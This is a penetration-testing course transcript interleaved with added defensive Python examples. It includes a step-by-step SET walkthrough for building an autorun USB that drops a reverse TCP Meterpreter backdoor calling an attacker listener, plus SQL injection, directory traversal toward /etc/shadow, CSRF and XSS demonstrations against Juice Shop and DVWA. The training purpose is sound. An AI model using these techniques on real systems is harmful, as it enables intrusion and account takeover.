So in this video we talked about some of the most well-known and used social engineering attacks. It is very important to realize there are some attacks that are actually social engineering attacks, and there are others that are physical attacks. So for example dumpster diving, lock picking, tailgating: those are physical attacks. There are situations, though, where there is a mixture: you will have an attack that makes use of social engineering techniques along with physical attacks. I hope you enjoyed this video. Thank you very much.

Hello guys, module 8, lecture two. This is a hands-on video and the goal here is to show a very well-known tool which can be used to deploy social engineering attacks; it may help you deploy social engineering attacks. So you must keep in mind that this tool here, since it's a tool, will help you with the technical
social engineering attacks; most of the social engineering attacks are more human driven than technically driven, so there are just a few cases in which you can use this tool to perform a social engineering attack. Obviously you also have to do a lot of human interaction, emotional interaction, in order to achieve your goal and collect the data that you actually need. But okay, the tool that we are going to take a very brief look at here is going to be the Social-Engineer Toolkit, or SET. By default Kali Linux already comes with this tool, so basically you can simply do sudo setoolkit; you have to run it as the admin user. Similar to the Metasploit framework, the SET toolkit is also a framework; it actually brings together a bunch of tools, and you are going to see an interactive menu which you can use, and the SET toolkit will help you do whatever you want to do. So let me first invoke the SET toolkit here, and there you're going to see an introductory screen. The first time that you run the SET toolkit it will actually show you a disclaimer and you have to agree with that disclaimer in order to continue using the tool. Basically what it will say is: hey, this tool here should be used for security purposes, so you should use it to test your own environment; you should not use it to perform attacks, at least unless you have the permission of the other end to do such. Okay, once you accept it you are going to face this menu right here. So you have to select; as I said, it has an interactive menu to help you achieve your goal. So it's going to show us a few options here: number one, social engineering attacks, that's what we're going to do. You can also perform penetration testing; it has a fast-track penetration testing suite, so a bunch of tools, scripts that will help you quickly perform some penetration testing. Third-party modules: there are a few there and you can always add more. Update the Social-Engineer Toolkit; update SET configuration: it has a default configuration and you can change that; you can look at the man page, credits, about, or you can exit with number 99. Obviously we are going to pick option 1, social engineering attacks. Let's go there, and here are the options that you have: number one, spear-phishing attack vectors; let's just remember that spear phishing is related to sending emails. Website attack vectors: this should be associated with the pharming attack, but option two does not send emails, it just fakes websites. So for example you can create a local web server that will run a few specific web pages; for example you can fake the Google web page, you can fake Bing, you can fake LinkedIn, there are some web pages that you can fake there, and it will also allow you to add other pages in case you want, so you can customize it. So it only gives you the web page; it allows you to fake a web page, okay, it does not lure the target to come to that web page. Three, infectious media generator: that is actually the option that we are going to use. The attack that we want to do here is the USB key drop, so we want to generate a flash drive that will have a backdoor with the reverse TCP payload. You may remember that the reverse TCP payload is the one that, once executed on the target machine (which can be a Windows machine, it can be macOS, it can be Linux; there are reverse TCP attacks for many different operating systems, and we are going to see how to create it for a Windows environment but it also has other options), makes that machine connect to your machine on a specific port. So your machine has to be listening on that port, in a way that when the target executes that payload executable file it will connect to that port; that port must be running on your machine. Then you can get full control of that target machine remotely. So that's what we're going to do. You can also create mass mailer attacks, Arduino-based attack vector, wireless access point attack vector, QR code generator attack vector, PowerShell attack vectors, and some additional attacks that you could provide using some third-party modules.

So what we're going to do here is go to option three, and there is an explanation right there: "the Infectious USB/CD/DVD module will create an autorun.inf file and a Metasploit payload. When the DVD/USB/CD is inserted it will automatically run if autorun is enabled. Pick the attack vector you wish to use: file format bugs or a straight executable." Those are the options that we have: file format exploits or standard Metasploit executable. We are going to pick option 2 because the SET toolkit will interact with the Metasploit executable that we already have, so it's leveraging the framework that we already have in our system, the Metasploit executable. So what is the system you are willing to attack, and which type of payload are you willing to create? So there it is, you have a few options there; the option that we are actually going to use is option two, Windows reverse TCP Meterpreter. So option two. What's the IP address for the payload listener? Once again, this type of attack occurs by forcing the target to connect to your machine, and then your machine, as an attacker, will use that channel, that connection, to issue commands remotely to the target machine. That's why it's called reverse TCP: the server here is your attacker machine, it's not the target machine. So the IP address that you have to provide is your machine, or the machine that you are going to use to control the target machine; in my case you may remember that my Kali Linux machine has this IP address, 192.168.0.20. And what is the port that your machine will listen on? Usually, for some reason, this is the default for the reverse TCP payload, 4444, but it really doesn't matter, you can specify any port you want. I press Enter and it's generating the payload, please be patient. Let's remember what the payload is: the payload is actually the file with the instructions; it's the header with instructions of what is supposed to be executed, it's the attacking code. "Payload has been exported to the default SET directory located under /root/.set/payload.exe. Your attack has been created in the
set home directory folder auto run note a backup copy of the template file is in that location copy the contents of the folder to a CD DVD USB to auto run so observe here that we have two different things one is the payload file is stored in slash root slash dot set slash payload.exe in case you just want to send to copy the payload the back door to the flash drive that's the file that you have to create but that's not actually what you want right you want to make it an auto run attack so
you want to make sure that once the target plugs that flash drive in or um inserts the the media the CD or the DVD media it automatically runs the the payload what you have to do is to actually copy the content of the slash root slash set slash auto run folder to that flash drive in that case okay create a listener right now yes or no so basically it's asking do you want to do you want me to run the listener right now do you want me to open port 44444 and keep waiting for that
Target to connect to that Port so that I can reverse TCP and send instructions to that Target well if you do you answer yes in a case where you're not going to run it now because you're still you're not yet um providing that flash drive to someone somehow then you can enter no and you can run it back later on let me answer yes and launching merisploit this could take a few be patient or else no shells for you and there you go started reverse TCP Handler on 192.168.0.20 so observe here that this is marisploit
running right here right there okay so the reason why we chose this option right here standard meta exploit executable is because when I invoke The Listener as I do now it's going to launch my merisploit framework which is going to make it a lot more a lot easier for me okay so it's processing the the instructions required to um run the the reverse TCP attack you may remember that to do that using metisploit we have to set a payload which is this payload right here when we do that we have to set the L host
variable the L Port variable and then it will execute that that that listener there it is the listener is running now all that I have to do is to copy so I'm going to quit here because I really don't need it 99 99 now I am going to look at the content of Slash root slash dot set directory and we have the payload.executable there but we also have the auto run directory over there with the autorun.inf and program.exe that's what you need to copy to the flash drive so in this video we saw how to
actually implement a social engineering attack using the Social Engineering Toolkit, SET. I hope you enjoyed this video, thank you very much.

Hello guys, welcome to module 9, and our topic here is going to be application vulnerabilities. Now, most of the application vulnerabilities that we are going to find are associated with some kind of injection vulnerability, and that is actually going to be our focus here; we will also see that there are many different types of injections. Now, there are vulnerabilities, at least application vulnerabilities, that are not precisely associated with injections; as an example we can simply see a misconfiguration. But in the long run, although most of these vulnerabilities are not directly associated with injections, one way of exploiting those vulnerabilities is by injecting some code, for example, which characterizes an injection vulnerability or injection attack. So let's talk about some of those.

Nowadays most of these applications are web applications, and since most applications are web applications, they are usually communicating with a database, and that is actually why SQL injections are so famous. They are constantly being used, these vulnerabilities are always there, and we have to tackle that type of vulnerability. Now, one way of defending against this type of vulnerability is validating the input. Validating the input basically means that you, as a web designer or web developer if you will, should validate the input fields that your website has. So let's say that your website has a form that requires name, telephone number, email and then comments. Those fields should be validated, but there is one problem: if you want to make these forms very flexible, giving options to the user so that he or she can type a lot of stuff, for example in the comments field, that means that it's very difficult to specify the strings that can be accepted. So in this type of form implementing a whitelist becomes very complex, and therefore it's easier to implement blacklists. In a blacklist, you as a web developer, or the web application firewall admin, are going to say "hey, these are the keywords, these are the strings that are restricted, or the symbols that are not allowed", whereas in a whitelist you have to specify "this is what this person can enter". So you can see the complexity of doing that. Once again, that is why SQL injections are so common: because it's very difficult to deploy this kind of defense. Validating input can be very complex, and due to that complexity attackers can come up with strings in which they try to disguise that string within another legit string.

So if we take a look at an example here, you can see that in this URL, and this is just one way of entering a URL, when a web application performs a SQL statement, basically what that application, or even the web server, is doing is accepting the URL, the link to the page, the address to that page, a question mark, and then some fields that are supposed to be accepted. So here basically what we're doing is: this is a login page called login.php, we use the question mark and then we specify the input fields that we have to fill out. In this case we have user; we could even have user equals John and password equals whatever the password is that you want to define. Now the key thing here is this: whatever comes here is going to be a regular input field that you're filling out, correct? Now the problem is that this is going to actually be appended to a SQL statement. Attackers, since they know that whatever comes after the question mark is going to be appended to a SQL statement, can come up with additional strings that will be added to that; therefore they can even come up with, for example, a string that will always return a true result. So in this case, as we can see here, what they are doing is informing user (well, obviously you have to know that user is a valid input field, which is very easy to know, to visualize) and then we finalize that statement with the single quote. But it's not actually the statement that is being finalized, it's just that portion of the statement, just what completes what is expected by the built-in statement; but then we append something else, in this case we are appending "or 1 equals 1". As you may know, "or" means any true result will actually return a total result of true as well, and since one will always be equal to one, then the result is true. This means that, let's say that this is a login web page, if this web application is not protected against this type of SQL injection, that attacker will be able to log in as an admin user. You are actually going to see that in our lab video, where I'm going to show you how to implement this using a vulnerable website that belongs to the Juice Shop project from OWASP.

Now there are situations where the web developer foresees this possibility and tries to prevent that. In that case there is another type of attack that will just implement parameter pollution. Basically what's being done here is appending new parameters, new input fields, to the SQL statement, because for example one of the protections or defenses against SQL injection, at least a simplistic one, is to verify whether the attacker is informing just one single parameter, as we can see in this first example right here, and maybe that's the only thing that is being verified. So what the attacker can do is, instead of informing just one single parameter, inform another second, third, fourth parameter. Here in the second example we have user John and user John again; it's the same parameter, but it doesn't really matter if the defender, the web developer, is only verifying for a singularity of parameters.

Now in many situations there are web applications that, in order to defend against SQL injections, prevent the response: when you inform a SQL statement, that web application is not going to give you a result, so you don't actually know whether that website is vulnerable to SQL injections or not. But one good strategy is to realize that, in order to verify whether the website is vulnerable to SQL injections, you verify whether it is not vulnerable. What does that mean? When a website is protected against different kinds of SQL injections it will actually return you an error message; if it doesn't return you anything at all in different situations, that means that it can be vulnerable to SQL injections, it's just not returning an output. So that is called a blind SQL injection, and this example here, where you inform any input field equals any value, single quote, or 1 equals 1, is one example of a SQL injection that can show you that it is a blind SQL injectable website.

Now, other kinds of injections: we have code injections, and the most common one is cross-site scripting, or XSS, which can basically be divided into two
different types: we have the reflected XSS and the persistent XSS. What is the difference between those two? Well, first we have to understand what cross-site scripting actually is. Basically cross-site scripting is a type of attack where someone injects some code, usually it's a client-side script, so it's a script that is executed on the client side; it forces that client to execute that script. Obviously this script tends to be something malicious, for example a pop-up window will say "hey, click here, you're gonna get a one thousand dollar reward", and when that person clicks there something happens: that person is redirected to a fake website, a bogus website, a trojan horse is downloaded and installed on that person's computer, something like that.

Now what is the difference between a reflected cross-site scripting attack and the persistent one? Reflected happens when the website developer is actually aware of that malicious code. What that means is you are accessing a website that is not trustworthy, you are accessing a website that you should not be accessing, and that website developer wants you to access it so that he or she can execute a script on your machine, on your browser. Now there is another one that is persistent, and that is a situation where a scripting code is stored in a website; usually the maintainer, the developer, is not aware of that code, but somehow he or she allowed someone to inject that code, insert that code, into his or her website. It's very common to be used on discussion boards, on forums: so you access a forum web page, and someone accessed it earlier and posted something, and within that code there was a malicious JavaScript, for example. When you access it, well, it's not the website developer that posted it there, it was someone else, and when another client accesses it that code is going to be executed by your web browser.

We also have the command injection, and one way of performing command injection attacks is over websites that allow the Common Gateway Interface, commonly known as CGI. Now, one language that is very much used in order to create CGI websites is PHP, Perl or Bash, and what is the problem with this type of technology? The problem when using a CGI gateway is that what it's actually doing is allowing that website to send instructions, system instructions, via the web server. So those instructions are system instructions; for example, a very simplistic one, you can create a CGI website that asks for any command. So you're creating a website to train users to learn Linux, and in order to see whether your students are actually learning Linux or not you create a website that says "hey, place in here any Linux command and let's see if it actually works". Okay, but when you're doing that you are actually allowing that user to execute a system command, and you never know what that user is actually going to execute, what kind of instruction is going to be sent.

Cross-site request forgery attack, so XSRF, is actually the opposite of cross-site scripting. How so? Cross-site scripting is a type of attack where the client relies on the server: so the client is accessing a website and trusting that website, "okay, I'm going to access this page because I know that I can trust this guy or this company", but then that may not be the case. There is the opposite, a situation where the server trusts the client. So let's see an example, and we are actually going to execute it to see how it works in our lab video. One example is, let's say that you just accessed your online bank account; you are already logged in, which means that a trustworthy session has been created. That means that the web server actually trusts you as a client, meaning that when you enter a URL that website is not going to ask you to re-authenticate: you are authenticated, let's say 30 seconds ago, you don't have to do it again, that's why we created a session, that's why I asked for your credentials. Okay, but then the client can access another website, open another tab on the browser for example, and using that other tab you access a suspicious website, and that website says "hey, click here", and you go and click. But that is actually a link that is a reference, a URL, that sends an instruction to your other website, your bank account, and it's actually telling you to make a wire transfer, for example. Since you are already logged into your bank account, that transaction is actually going to work. Now, it requires that the attacker knows a bunch of stuff: that specific URL, the input fields that are required to perform that wire transfer, and a bunch of other stuff. But you have to also remember that there is a possibility that the attacker knows the type of website that you access. Well, if he knows that you have an account in a specific bank, all it takes is that the attacker knows the specific URL to perform a wire transfer, so it's actually not that complicated.

We also have session attacks, such as session hijacking. We are going to see how session hijacking works; basically, once again, it's based on cookies. Once you access a website, that website will send you a cookie or a set of cookies, and that cookie can be used for another interaction with that website, so a bunch of authentication steps may be skipped because you already have that cookie. If an attacker can get hold of a cookie, well then he can interact with that website impersonating you as a client. Also, an attacker can capture the traffic and capture the session ID that is being used between you as a client and the web server; he or she can then, let's say, interrupt your conversation with that website and start to talk to that website using that session ID, impersonating you, the client.

We also have redirects, which is actually a very simplistic type of attack but also very accurate. So let's say that there is a website, and that website says "hey, we moved somewhere else, you are being automatically redirected", and then after five seconds you are redirected to somewhere else. This type of attack happens the same way; the difference is you are actually being redirected to a suspicious website, at least. That is very common to see when people are trying to access websites that are supposed to be paid for, or services that you have to pay for, but they're trying to find pirate websites. So they promise that you can go
there and you can, for example, watch a video online, a movie online, not paying for it; you just have to click there. And then you click somewhere and it says "you're being redirected", and when you see it, well, okay, so you are in a website that will allow you to watch that video, but you don't actually know what else is behind that redirect.

Direct object reference, and we can see one example here: many websites are not protected against direct object reference. What does that mean? If you have a website, you are hosting a website, and from that website people can actually get access to documents or objects. So for example a teacher has a website, and that person is going to post docs, PDFs, after each class, for example, so that students can go there and go back to the content that they studied during that class. But the problem is, those documents should only be available when they are supposed to be available. Is it possible for a student, for example, instead of accessing doc ID 1234, to just go there to that URL and change it to doc ID equals 2345, and will he or she be able to download that document? Let's say yes, but is that supposed to happen? Is he or she supposed to be allowed to access it? So that is a direct object reference. It's okay to allow people to access these documents, you just have to make sure that only the ones that are supposed to be allowed are actually allowed, and you as pen testers should verify this whenever you see a direct object reference.

We also have directory traversal. Directory traversal occurs when you are accessing a file, so let's say, using the same example here, www.example.com/doc.php. Okay, so just looking at it I know that there is a file called doc.php. Okay, if I check and I see that this is an HTTP Apache web server, there is a very high probability that it's stored in the /var/www directory. Okay, what if instead I delete doc.php and I enter ../../etc? Obviously I have to know the system, I have to know the service, the app that is running the service, but if I do, I can try. In this example that I just gave, I'm trying to go back to the root directory and then enter the /etc directory. If it works I can even try to retrieve the shadow file. And similarly we have the file inclusion attack, which is a type of attack where the web server allows me to send, upload, files. Obviously I can try to send a trojan horse, a backdoor, or replace an existing file, for example the /etc/passwd file, in order to use a file that contains a user account that I know about.

We also have to verify coding issues. As pen testers we have to see if the web developer and the network admin are treating errors, if they are handling errors. So for example this image here illustrates an example of an IIS web server that does not properly handle an error message. You can actually see here that this SQL error here is giving you a bunch of information here. So, okay, what happened: there was a form, probably, that was asking for a bunch of information such as name, password, ID, and the attacker, or just a regular user, didn't inform the ID and hit submit, for example. Well, what the website was supposed to do was say "hey, empty field, this field cannot be empty", but no, that's not what's happening, the error was not handled. So what is going on here is that the web application is actually returning the error message that the web server returns, and that actually gives, in this case, an attacker a bunch of information. So now we can see here information such as: ID is an attribute, it's an integer attribute; there is a module, a function called protected void Page_Load; and there is a bunch of other stuff here that we could find.

Comments are also very dangerous. They're very useful, so if you're a developer, inserting comments in your code is obviously very helpful; the problem is, depending on the type of web page that you're creating, if you insert comments in that page a user or an attacker can try to see the source code of that page, and that will also allow the attacker to see the comments. If the developer is making comments that can give more information than they're supposed to give, then the attacker will use that additional data.

Hard-coded credentials, obviously, this is critical because, for example, when we have this type of failure there is a very high probability that other services are also using that same password. So if someone gets access to source code, and in that source code there is a user and password, for example, there is a very high probability that it is a valid set of credentials for other services as well.

Shared APIs, also another problem we see every day. For example, you're using an app, you just installed an app on your iPhone, for example, and since it's the first time it's going to ask you for credentials. Okay, you have to create your membership credentials, or you can simply use your Facebook account, for example. Well, then you just click "use Facebook account", and that app is going to connect to your
Facebook account, and then you're logged in. How does it do it? It's using a shared API, a Facebook API; it's a set of functions that allows other applications to access your account. Obviously you can see how critical that is: you are actually allowing other users, other software or developers, to access another app using valid credentials.

Now, as a pen tester you have to be aware of static and dynamic application security testing tools, because you're actually going to have to verify if the applications that are being used by your client are reliable, and if they have failures you have to at least report that to your client. Now there are some tools that can help you as a pen tester to verify whether the applications that are being used by your client are secure or not. So first of all we have the static application security testing tools, or SAST. Basically they're only going to verify the source code; they are not going to verify the flow of the code, but just the syntax of that code. It does not execute the application, it just verifies the source code, so that is a static application security testing tool. Here on this link over here you can actually see a bunch of SAST tools for different languages, different operating systems, different architectures; you just go there and find the SAST tool according to the system that you are trying to verify.

And we also have the DAST, dynamic application security testing tools. These are tools that are actually going to execute an application and allow you to say "hey, I want to test this attribute here, I want you to inform this input field here with this content". It's a tool that will dynamically execute that software that you are analyzing and give you the chance to interact with it. Some examples that we have, and that you have to know about for the CompTIA PenTest+ exam, are the OWASP Zed Attack Proxy tool and Burp Suite; we are actually going to analyze Burp Suite. Now we also have fuzzing DAST tools. The difference between a regular DAST tool and a fuzzing DAST tool is that fuzzing DAST tools dynamically, in an automated way, fill out those fields for you. So it's a tool that will verify what the possibilities of interaction are and will automatically create data to pass to that software and verify if flaws can be found. Some examples here that you must also be aware of for the CompTIA PenTest+ exam are American Fuzzy Lop, or AFL, and Peach Fuzzer. Peach Fuzzer is a commercial tool, whereas American Fuzzy Lop is an open source and free tool.

So in this video we discussed some different types of injections, such as SQL injection and different types of code injection, and some tools that can be used in order to leverage or test those types of injections. We also talked about the concept of static application security testing tools and dynamic DAST tools, along with some automated testing tools called fuzzing DAST tools. I hope you enjoyed this video, and we're gonna see some of these tools in our next lab video. Thank you very much.

Hello, welcome to our second video in module 9. We initially discussed some types of application attacks, more precisely web application attacks, such as SQL injection and different types of code injection, cross-site scripting, cross-site request forgery, session hijacking and so many others. In this video we are actually going to see tools that can be used to exploit some of those flaws, or techniques, ways that you can actually practice. Now we have to keep in mind that the CompTIA PenTest+ exam not only requires you to know some tools but also requires you to show that you can use techniques, that you can actually run exploits; even to exploit a vulnerability you have to do it yourself without using a specific tool. So for example SQL injection: in order to perform SQL injections you have to understand how it works and then you try to deploy it. So this is what we're going to see here, not only tools that can be used but the techniques, how to explore and exploit those techniques.

Therefore, a project that I want you to take a better look at, and if you can, dive deeper into it and try to go through all the flags that you can, is the OWASP Juice Shop project. It's a project from OWASP where they intentionally created a web application that has a number of vulnerabilities, more specifically the top 10 web application vulnerabilities, and you have to try to capture those flags. So that's the OWASP Juice Shop. If you want, you can download it and deploy it on your own server; this is not what I am going to show here, actually I'm just going to very briefly show you how to access it and how to perform a SQL injection attack, a very simple one, but again I strongly recommend you to go through all the 10 flags: owasp.org/www-project-juice-shop
and if we go down here, all the way down, here in documentation we have "online demo", and that's exactly where we are gonna go. That is the OWASP Juice Shop that they already give to us; it's an online project. Now, as I mentioned, what they do is they created a website that sells juice, all different kinds of juices, okay, all different kinds of products, and then you have to capture the flags. What we are going to do is: I'm gonna go here in Account and log in. As you know, a SQL injection attack is an attack where you try to pass additional SQL statements appended to an expected SQL statement. So what I'm going to do is, here in email it's expecting some kind of string; I'm gonna type whatever, and I'm going to close that string, but then I'm going to append or 1 equals 1, semicolon, dash dash. I'm going to inform anything here as the password and log in. Okay, so, well, it seems like it just reloaded the page, but if I go here to Account I am logged in as an admin user. There it is.
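The login bypass just shown against the Juice Shop, together with the whitelist versus blacklist discussion from the first video of this module, side by side in code. This is an added example, not code from the course, from DVWA or from OWASP: it uses an in-memory SQLite table with two constructed accounts, and the names `login_vulnerable`, `login_safe`, `email_is_valid` and `comment_is_blacklisted` are mine. It goes a little beyond the single payload in the video by also showing why a field with a known shape (email) can be whitelisted while free text can only be blacklisted.

```python
import re
import sqlite3


def make_db():
    """Constructed demo database: two accounts, admin first.
    Plain-text passwords only to keep the example short."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("admin@example.com", "hunter2", "admin"),
        ("john@example.com", "letmein", "user"),
    ])
    return conn


def login_vulnerable(conn, email, password):
    """Builds the statement by string concatenation: whatever the form
    sends is appended to the SQL text, exactly the situation described in
    the slides. Returns the role of the first matching row, or None."""
    sql = ("SELECT role FROM users WHERE email = '" + email
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, email, password):
    """Parameterized query: the values travel separately from the SQL
    text, so a quote inside the input can never terminate the string."""
    row = conn.execute(
        "SELECT role FROM users WHERE email = ? AND password = ?",
        (email, password),
    ).fetchone()
    return row[0] if row else None


# Whitelist: a field with a known shape (email) can be matched exactly.
EMAIL_RE = re.compile(
    r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}")


def email_is_valid(value):
    return EMAIL_RE.fullmatch(value) is not None


# Blacklist: the only option for free text such as a comments field, and
# never complete; it only catches the tokens someone thought to list.
BLACKLISTED_TOKENS = ("'", "--", ";", " or ")


def comment_is_blacklisted(value):
    lowered = value.lower()
    return any(token in lowered for token in BLACKLISTED_TOKENS)


def demo():
    """Runs the Juice Shop style payload against both login versions."""
    conn = make_db()
    # Constructed payload: closes the string, forces a true WHERE clause
    # and comments out the password check that follows.
    payload = "' OR 1=1 --"
    return {
        "vulnerable": login_vulnerable(conn, payload, "anything"),  # admin
        "safe": login_safe(conn, payload, "anything"),              # None
        "legit": login_safe(conn, "john@example.com", "letmein"),   # user
        "whitelist_rejects_payload": not email_is_valid(payload),
        "blacklist_flags_payload": comment_is_blacklisted(payload),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The parameterized version is the actual fix; the two validators are there to make the slide's point concrete: the email check is a short regex because the field has a known shape, whereas the comments blacklist is a guess at bad tokens and will always miss something, so it should sit in front of a parameterized query rather than replace it.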
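The direct object reference and directory traversal checks described in the first video of this module, the ones a pen tester should verify wherever a document id or a file name appears in a URL, as an added example of what the defending side of the doc.php page looks like. This is my code, not the course's; the document root `/var/www/docs`, the two document ids and the per-document allow list are constructed for the demo.

```python
import os

DOC_ROOT = "/var/www/docs"   # assumed document root for the example

# Constructed access list: which users may fetch which document id.
DOCS = {
    1234: {"file": "class1.pdf", "allowed": {"alice", "bob"}},
    2345: {"file": "class2.pdf", "allowed": {"alice"}},
}


def resolve_under_root(root, requested):
    """Directory traversal guard. Joins the requested name onto the root,
    normalizes it (collapsing ../ segments, and symlinks where the path
    exists) and refuses anything that resolves outside the root.
    Returns the absolute path, or None when the request escapes."""
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, requested))
    # commonpath() is the safe containment test; a plain startswith()
    # would accept /var/www/docs-private as being "inside" /var/www/docs.
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None
    return candidate


def fetch_doc(user, doc_id):
    """IDOR guard. Knowing a valid id (1234, so probably 2345 too) is not
    enough: the requesting user must be on that document's allow list.
    Returns the path the server may read, or a short refusal reason."""
    doc = DOCS.get(doc_id)
    if doc is None:
        return "not found"
    if user not in doc["allowed"]:
        return "forbidden"
    path = resolve_under_root(DOC_ROOT, doc["file"])
    return path if path is not None else "bad path"


def fetch_by_name(requested):
    """A doc.php?file=... style endpoint, hardened: any name that escapes
    DOC_ROOT (../../etc/passwd, an absolute /etc/shadow) is refused."""
    path = resolve_under_root(DOC_ROOT, requested)
    return path if path is not None else "refused"


if __name__ == "__main__":
    print(fetch_doc("bob", 2345))              # forbidden
    print(fetch_by_name("../../etc/passwd"))   # refused
```

The two guards are independent and both are needed: the allow list decides whether this user may see this object at all, and the path check makes sure that the file name the server ends up opening is the one under the document root and not something reached by walking up the tree.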
So this is a very simplistic type of SQL injection, but there are many websites that actually accept it.

Another one that I want you to see: I created another virtual machine, another Metasploitable virtual machine, but this is not Metasploitable 3 with the Windows 2008 server; this is Metasploitable 2, which comes with an Ubuntu Linux Metasploitable system, and out of all those services that come along it has a web server as well. So what I'm going to do here is access that web page, which is right here, let me do this. There, so that's the Metasploitable 2 web server, and it gives to us a bunch of different web pages. The web page that I am actually going to access is DVWA, and it asks for a user and password; I'm going to inform it there. There it is. So again, similar to the Juice Shop, this is a server that has a bunch of flaws; they intentionally built a bunch of flaws, okay. So this is the Damn Vulnerable Web App, DVWA, and let's take a look at one here which shows us cross-site request forgery, or CSRF, or XSRF, okay.

So it's asking for the current password; I'm going to inform here "password", okay. The new one is going to be, I'm going to keep it the same, "password" and "password", okay, good, change: password changed. Now what matters to me is the URL up here. You can observe that here in the URL we have the input fields along with their values: password_current, it's this input field here, the content is "password"; password_new, which refers to this field here, is also "password"; and confirm new password, which is the password_conf attribute right here, value "password". Okay, here's what I'm going to do: I'm going to open another tab, and in this other tab I am going to change the password. So password_current is the current password, "password"; password_new, I'm going to change it to "pass", not "password"; and password_conf also "pass", not "password", and I am going to hit enter. Okay, so it's showing the same web page, same result, and here's what I want to see: I'm going to log out the admin user, I'm going to inform the original password, which is "password", and no, it didn't work. I'm going to inform admin with password "pass", and there it is.

So what happened here? I used the URL to change my user's password, and what did we see here? We saw a type of XSRF attack, cross-site request forgery attack. If I am an attacker and I know that using a URL I can change data, I can change information of someone, or I can perform a specific action such as execute a wire transfer, if I know that the user is logged into that specific system, in this case logged into the DVWA system, and if I can force that user to execute that URL, I can get him to change the information that I want or perform the action that I want him or her to execute. So this is a demonstration of the XSRF attack.

Now another attack that I want you to see is the cross-site scripting attack, and this is the stored cross-site scripting attack, or persistent if you will. I have two HTML files here: I have the no-XSS HTML file, which simply has just some basic HTML instructions, okay. Here I am executing that file, the no-XSS one; what does it do? Okay, it just shows the HTML content that I created. Now what I'm going to do is create another one, which is the XSS HTML file, and what does it have here? Just one different instruction: there is a script which says alert "gotcha", so it's just a pop-up, right? But what I want you to see is that I can actually create a web page that will force the web browser of my client to execute something that person is not aware of. For example, I could force that person to download a file, I could force that person to go to a specific web page, I could force that person to submit a specific form, whatever that is. So let me execute that file and see how it actually works, and there it is: here is the xss.html file, "gotcha", that's the pop-up window, and then the web page. Well, now I just created a pop-up message, but I could do a lot more with it.

And lastly, to finalize, let's take a look at a tool called Burp Suite, and here I'm going to go to my Kali Linux virtual machine. All you need to do is to run it, and you can run Burp Suite with a regular user account; I just want to make sure that I will have all the resources that I need in case I need any additional resources, so that's why I'm executing it as a sudo user, as an admin user. Now, Burp Suite actually has a bunch of features; the feature that we are going to use is just a proxy. It's saying that my Java runtime environment is outdated, which is okay, and I'm going to start my project. So I'm going to run it as a proxy server, similar to a Squid proxy. Now what is different about it? So I'm gonna go here to Proxy, and we can see that we have this button here, "Intercept is on", so it's not only receiving requests from my proxy clients, so I am intercepting as any proxy does, but I am not going to forward that request until I, as an attacker or admin, allow the app to do so. So first of all, what we have to keep in mind is this is a proxy web server, so you have to make sure that your proxy is running on the appropriate port and IP address. By default it's going to listen on the localhost IP address, port 8080. I am going to add a new one, so it's the same port, 8080, but I'm going to associate it with this IP address here, which is my internal LAN IP address. Why? Because now I am going to go to my Windows 2008 server and tell it "hey, you have to use that proxy server".
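For the two DVWA attacks shown just before the Burp Suite demo (the password change through a plain URL, and the injected script that pops up "gotcha"), here is what the defending side looks like in code. This is an added example, not DVWA's or the course's code: the session dictionary, the `SECRET` key, the session id and the handler names are constructed for the demo, and the field names password_current, password_new and password_conf are the ones from the URL shown in the lab.

```python
import hashlib
import hmac
import html
import secrets

# ---- Stored XSS: the fix is encoding on output -------------------------


def render_comment_unsafe(comment):
    """Drops stored text straight into the page. A comment containing
    <script>alert('gotcha')</script> runs in every visitor's browser."""
    return '<div class="comment">' + comment + '</div>'


def render_comment_safe(comment):
    """html.escape turns < > & " ' into entities, so the browser displays
    the text as text instead of executing it."""
    return '<div class="comment">' + html.escape(comment) + '</div>'


# ---- CSRF: tie state-changing requests to the session -------------------

SECRET = secrets.token_bytes(32)   # server-side key, constructed per process


def csrf_token(session_id):
    """Token bound to the session with an HMAC: the server can recompute
    it for checking, while a page on another site cannot read or derive it."""
    return hmac.new(SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def change_password_vulnerable(session, params):
    """DVWA-style handler: any request carrying the right field names from
    a logged-in browser succeeds, including one triggered by a link on an
    attacker's page (the URL trick from the lab)."""
    if not session.get("authenticated"):
        return "login required"
    if params.get("password_current") != session["password"]:
        return "wrong current password"
    if params.get("password_new") != params.get("password_conf"):
        return "mismatch"
    session["password"] = params["password_new"]
    return "changed"


def change_password_safe(session, params, method="POST"):
    """Hardened handler: state changes only via POST (so a bare URL cannot
    do it) and only with a token that matches this session."""
    if not session.get("authenticated"):
        return "login required"
    if method != "POST":
        return "method not allowed"
    supplied = params.get("user_token", "")
    expected = csrf_token(session["id"])
    if not hmac.compare_digest(supplied.encode(), expected.encode()):
        return "csrf check failed"
    if params.get("password_current") != session["password"]:
        return "wrong current password"
    if params.get("password_new") != params.get("password_conf"):
        return "mismatch"
    session["password"] = params["password_new"]
    return "changed"


def demo():
    """Replays the lab's forged request against both handlers."""
    forged = {"password_current": "password",
              "password_new": "pass", "password_conf": "pass"}
    results = {}
    s = {"authenticated": True, "id": "sess-42", "password": "password"}
    results["vulnerable_via_url"] = change_password_vulnerable(s, forged)
    s = {"authenticated": True, "id": "sess-42", "password": "password"}
    results["safe_via_url"] = change_password_safe(s, forged, method="GET")
    results["safe_post_no_token"] = change_password_safe(s, forged)
    legit = dict(forged, user_token=csrf_token("sess-42"))
    results["safe_legit_form"] = change_password_safe(s, legit)
    results["escaped"] = render_comment_safe("<script>alert('gotcha')</script>")
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The order of the checks in the hardened handler matters: the method and token are verified before anything about the password is looked at, so a forged GET from another tab never reaches the state change, while the site's own form, which carries the token the server rendered into it, still works.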
